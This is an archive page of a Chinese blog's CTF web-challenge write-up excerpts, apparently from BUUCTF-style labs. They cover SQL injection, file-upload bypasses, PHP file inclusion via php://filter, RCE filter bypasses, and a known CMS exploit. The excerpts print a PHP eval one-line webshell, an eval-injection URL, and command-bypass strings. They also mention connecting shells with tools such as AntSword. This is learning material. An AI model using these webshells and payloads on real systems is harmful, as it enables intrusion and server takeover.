12 2021 档案

摘要:打开网站 源码中发现内容 // ~~~post money and password~~~ if (isset($_POST['password'])) { //post方法传递password password=_POST['password']; if (is_numeric($pass 阅读全文
posted @ 2021-12-24 19:27 oldliutou 阅读(31) 评论(0) 推荐(0) 编辑
摘要:打开网站 文件内容 /flag.txt /wecome.txt /hints/txt url发现文件包含 不加filehash参数会爆错 filehash的值应该是hints.txt文件中的计算式得到的 但是cookie_secret在哪里找? welcome.txt文件中有render??? 存在 阅读全文
posted @ 2021-12-24 19:12 oldliutou 阅读(15) 评论(0) 推荐(0) 编辑
摘要:打开网站 找到源文件index.php.bak 代码审计 <?php include_once "flag.php"; if(isset($_GET['key'])) { // 传递参数key key=_GET['key']; if(!is_numeric($key)) { //key只能是 阅读全文
posted @ 2021-12-24 18:50 oldliutou 阅读(33) 评论(0) 推荐(0) 编辑
摘要:打开网站 提示网站有备份 扫描网站目录 下载文件,代码审计 代码审计 class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'admin'; // private 类型 priv 阅读全文
posted @ 2021-12-24 18:37 oldliutou 阅读(41) 评论(0) 推荐(0) 编辑
摘要:打开网站 测试注入点和注入类型 ?id=1 ?id=3-2结果与?id=1结果一致 所以该关卡是数值型注入 **使用and 1、and 0测试注入点 ** 1. 2. 经过上面两个条件的测试,所以id为注入点 测试回显列数和回显信息 回显4列报错,所以回显的列数是3列 利用 union select 阅读全文
posted @ 2021-12-17 15:48 oldliutou 阅读(39) 评论(0) 推荐(0) 编辑
摘要:打开网站 绕过上传限制 文件类型被限制 修改MIME,成功绕过 使用冰蝎连接 源码审计 isupload=false;msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { if (($_FIL 阅读全文
posted @ 2021-12-17 14:42 oldliutou 阅读(42) 评论(0) 推荐(0) 编辑
摘要:打开网站 尝试上传点限制 回显弹窗,说明在前端做了限制,把js函数去掉可以绕过限制 本关卡只对前端做了限制 上传成功后的木马所在的目录 使用 蚁剑连接一句话木马 阅读全文
posted @ 2021-12-16 14:01 oldliutou 阅读(21) 评论(0) 推荐(0) 编辑
摘要:打开网站 存在参数id 测试注入点 判断什么类型注入 使用3-2数学表达式测试为字符型、结果显示的是id=3的结果,如果是数字型结果应该为id=1的结果 使用 or 或者 and 测试注入点 判断列数和回显的位置 当order by 4时,回显列数不正确,说明列数为3 使用union select 阅读全文
posted @ 2021-12-16 13:45 oldliutou 阅读(27) 评论(0) 推荐(0) 编辑
摘要:打开网站 注释里发现内容 <script> $('#calc').submit(function(){ $.ajax({ url:"calc.php?num="+encodeURIComponent($("#content").val()), //提交的地址 type:'GET', success: 阅读全文
posted @ 2021-12-15 19:02 oldliutou 阅读(45) 评论(0) 推荐(0) 编辑
摘要:打开网站 考点:文件上传 绕过上传限制 前端做了文件后缀名限制 把js函数去掉还是没有上传成功,后端代码也做了限制,寻找绕过点 使用phtml后缀名直接绕过限制 测试连接木马 使用蚁剑连接获得flag 阅读全文
posted @ 2021-12-15 18:37 oldliutou 阅读(78) 评论(0) 推荐(0) 编辑
摘要:打开网站 考点:文件上传 寻找上传漏洞点 修改MIME、名字可能过滤了,尝试一下PHP别的文件名后缀 php3、php4、php5、pht文件名后缀都被过滤了,phtml回显的内容不一致 尝试在内容里加上图片头 GIF89a? 使用蚁剑连接木马 测试了一下木马的功能,成功 使用蚁剑连接一句话木马 找 阅读全文
posted @ 2021-12-15 18:21 oldliutou 阅读(39) 评论(0) 推荐(0) 编辑
摘要:打开网站 并未发现异常,于是查看源码 在源码中发现一个秘密php文件并访问 提示不是来自某个地址的请求 抓包修改请求头 修改请求头 增加Referer请求头 X-Referer: https://Sycsecret.buuoj.cn 修改User-Agent User-Agent: Syclover 阅读全文
posted @ 2021-12-14 13:13 oldliutou 阅读(35) 评论(0) 推荐(0) 编辑
摘要:打开网站 考点:使用菜刀或蚁剑连接 获得shell 成功连接获得shell,找到flag文件 阅读全文
posted @ 2021-12-14 12:34 oldliutou 阅读(65) 评论(0) 推荐(0) 编辑
摘要:打开网站 测试漏洞:RCE 使用ls获得flag.php 使用cat flag.php 空格被过滤 绕过空格过滤 cat flag.txt catIFSflag.txtcatIFS$9flag.txt cat<flag.txt cat<>flag.txt 绕过字符过滤 使用字符拼接 阅读全文
posted @ 2021-12-14 12:22 oldliutou 阅读(27) 评论(0) 推荐(0) 编辑
摘要:打开网站 在注释中发现PHP文件 点击SECRET按钮,并没有什么东西 抓包分析 发现了一个php 文件 访问该文件,获得源码并开始代码审计 <?php highlight_file(__FILE__); error_reporting(0); file=_GET['file']; //文件包含 阅读全文
posted @ 2021-12-13 20:04 oldliutou 阅读(28) 评论(0) 推荐(0) 编辑
摘要:打开网站 考点:RCE 阅读全文
posted @ 2021-12-13 19:54 oldliutou 阅读(21) 评论(0) 推荐(0) 编辑
摘要:打开网站 考点:文件包含 测试文件包含漏洞点 利用php伪协议阅读flag.php源码 ?file=php://filter/read=convert.base64-encode/resource=flag.php 获得flag 阅读全文
posted @ 2021-12-13 19:43 oldliutou 阅读(30) 评论(0) 推荐(0) 编辑
摘要:打开网站 在注释代码中发现内容 很简单,传递cat参数,其中参数值为dog 成功获得flag payload http://xxxx/?cat=dog 阅读全文
posted @ 2021-12-13 19:34 oldliutou 阅读(19) 评论(0) 推荐(0) 编辑
摘要:打开网站 查看源码 访问source.php文件,开始代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source" >"sourc 阅读全文
posted @ 2021-12-08 21:55 oldliutou 阅读(65) 评论(0) 推荐(0) 编辑
摘要:打开网站 提示git泄露,估计是可以获取源码 然后开始源码提示开始下一步的操作 git泄露利用 使用Git_Extract工具 获得flag 在泄露的index.html文件中获得flag 阅读全文
posted @ 2021-12-04 21:57 oldliutou 阅读(103) 评论(0) 推荐(0) 编辑
摘要:打开网站 密码在注释里 登录成功 什么东西也没有,抓包发现response里有show字段 于是request一个show: 1 返回php代码 代码审计 <?php include 'common.php'; requset=arraymerge(_GET, POST,_SESS 阅读全文
posted @ 2021-12-04 21:48 oldliutou 阅读(50) 评论(0) 推荐(0) 编辑
摘要:打开网站 扫描目录 查找文件里的内容 输入vim -r /index.php.swp发现flag3 输入robots.txt 发现flag1 发现flag2 阅读全文
posted @ 2021-12-03 15:51 oldliutou 阅读(136) 评论(0) 推荐(0) 编辑
摘要:打开网站 注释里的内容 获得user.php 里面都是用户名 用bp爆破吧 爆破成功 username=lixiuyun&password=lixiuyun1990 登录网站 注释里发现内容 去掉注释,则是一个文件上传点,且注释提示文件上传点存在漏洞 上传图片马 上传各种绕过的方式都显示文件名不合法 阅读全文
posted @ 2021-12-02 13:24 oldliutou 阅读(34) 评论(0) 推荐(0) 编辑
摘要:打开网站 考点:已知CMS漏洞利用 在线搜索exploit 成功利用 蚁剑连接成功 找到flag 数据库配置文件 成功连接数据库 ,获得flag payload http://xxxxx/search.php?searchtype=5&tid=&area=eval($_POST[1]) 阅读全文
posted @ 2021-12-02 12:42 oldliutou 阅读(42) 评论(0) 推荐(0) 编辑
摘要:打开网站 题目类型:文件上传 注释中提示存在文件包含漏洞,怀疑是不是审计上传代码,并利用上传漏洞上传shell脚本 上传测试 上传php失败 利用php://filter伪协议获得index.php代码 ?file=php://filter/convert.base64-encode/resourc 阅读全文
posted @ 2021-12-01 16:30 oldliutou 阅读(52) 评论(0) 推荐(0) 编辑
摘要:打开网站 代码审计 <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ SESSION[nums]=0;_SESSION['time'] = 阅读全文
posted @ 2021-12-01 15:49 oldliutou 阅读(48) 评论(0) 推荐(0) 编辑
摘要:打开网站 题目类型:文件包含 代码审计 <?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); //包含path传递的参数 }else{ include('phpinfo.php') 阅读全文
posted @ 2021-12-01 15:19 oldliutou 阅读(37) 评论(0) 推荐(0) 编辑
摘要:打开网站 题目类型:文件上传 上传文件测试 上传内容 上传成功 蚁剑连接 连接成功 payload <script language="PHP"> @eval($_POST["pass"]);//php长标签 </script> 阅读全文
posted @ 2021-12-01 15:04 oldliutou 阅读(36) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示